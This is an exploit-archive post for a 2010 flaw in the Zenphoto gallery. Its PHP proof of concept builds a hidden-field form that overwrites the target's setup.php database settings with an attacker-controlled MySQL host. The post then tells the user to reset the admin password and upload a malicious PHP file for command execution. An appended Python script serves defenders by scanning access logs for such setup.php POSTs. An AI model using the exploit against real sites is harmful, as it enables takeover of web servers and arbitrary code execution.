[webapps / 0day] - Zenphoto Config Update and Command Execute Vulnerability
Posted on 26 September 2010
<pre>
========================================================
Zenphoto Config Update and Command Execute Vulnerability
========================================================

<?php
/*
Title            : Zenphoto Config Update and Command Execute Vulnerability
Affected Version : Zenphoto <= 1.3
Discovery        : www.abysssec.com
Vendor           : http://www.zenphoto.org
*/

// Setup script of the target Zenphoto installation
$path = "http://www.site.com/zenphoto" ."/" . "zp-core/setup.php";

// Database settings submitted to setup.php
$new_mysql_user = "abysssec";
$new_mysql_pass = "absssec";
$new_mysql_host = "abysssec.com";
$new_mysql_database = "abysssec_database";
$new_mysql_prefix = "zp_";

echo "<html><head></head>
<style>
body {font-family:tahoma;font-size:14px}
</style>
<body>";

echo "Zen Photo Image Gallery 1.3 Reset admin Password <br>
By : Abysssec @ Inc <br>www.Abysssec.com<hr>
<form method='POST' action='$path' >
<input type=hidden name='mysql' value='yes'>
<input type=hidden name='mysql_user' value='$new_mysql_user'>
<input type=hidden name='mysql_pass' value='$new_mysql_pass'>
<input type=hidden name='mysql_host' value='$new_mysql_host'>
<input type=hidden name='mysql_database' value='$new_mysql_database'>
<input type=hidden name='mysql_prefix' value='$new_mysql_prefix'>
After click on below , if target will can connect to your Mysql_Host :<br>
You Must view 'GO !' Messege ...<br>
Click on & wait .... <br>
Then , You need to set your admin user and password.<br><hr>
Upload file:<br>
you can Edit themes From themes Tab and Upload your malignant PHP file.<br>
<input type=submit value='Send Your Setting '>
</form>
";

echo "</body></html>";
?>

# Inj3ct0r.com [2010-09-26]
</pre>
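A defender-side check for the request this proof of concept sends, as an added example that is not part of the original advisory: it scans web-server access logs for POST requests to `zp-core/setup.php`. The Combined Log Format, the function names and the sample lines are assumptions, as is the premise that such POSTs are unexpected on a gallery that is already installed.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# The script the advisory's form posts to, under any install prefix;
# a trailing "/..." (PATH_INFO) still reaches the same script.
SETUP_RE = re.compile(r'/zp-core/setup\.php(?:/|$)', re.IGNORECASE)


def normalize(target):
    """Drop the query string, percent-decode, and collapse ./ and // segments."""
    path = unquote(target.split("?", 1)[0])
    return posixpath.normpath(path)


def find_setup_posts(lines):
    """Return {client_ip: [(time, normalized_path, status), ...]} for setup POSTs."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = normalize(m["target"])
        if SETUP_RE.search(path):
            hits[m["ip"]].append((m["time"], path, int(m["status"])))
    return dict(hits)


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [26/Sep/2010:10:01:02 +0000] "GET /zenphoto/index.php HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.23 - - [26/Sep/2010:10:02:10 +0000] "POST /zenphoto/zp-core/setup.php HTTP/1.1" 200 8421 "-" "-"',
    '198.51.100.23 - - [26/Sep/2010:10:02:40 +0000] "POST /zenphoto/zp-core/%73etup.php?x=1 HTTP/1.1" 200 8010 "-" "-"',
    '203.0.113.7 - - [26/Sep/2010:10:03:00 +0000] "GET /zenphoto/zp-core/setup.php HTTP/1.1" 200 900 "-" "-"',
    '192.0.2.50 - - [26/Sep/2010:10:04:00 +0000] "POST /zenphoto/zp-core/./setup.php HTTP/1.1" 403 199 "-" "-"',
]

if __name__ == "__main__":
    for ip, events in find_setup_posts(SAMPLE).items():
        for when, path, status in events:
            print(f"{ip} {when} POST {path} -> {status}")
```

A hit with a 2xx status deserves a follow-up comparison of the gallery's configured database host against the expected one, since the form above submits replacement `mysql_*` settings.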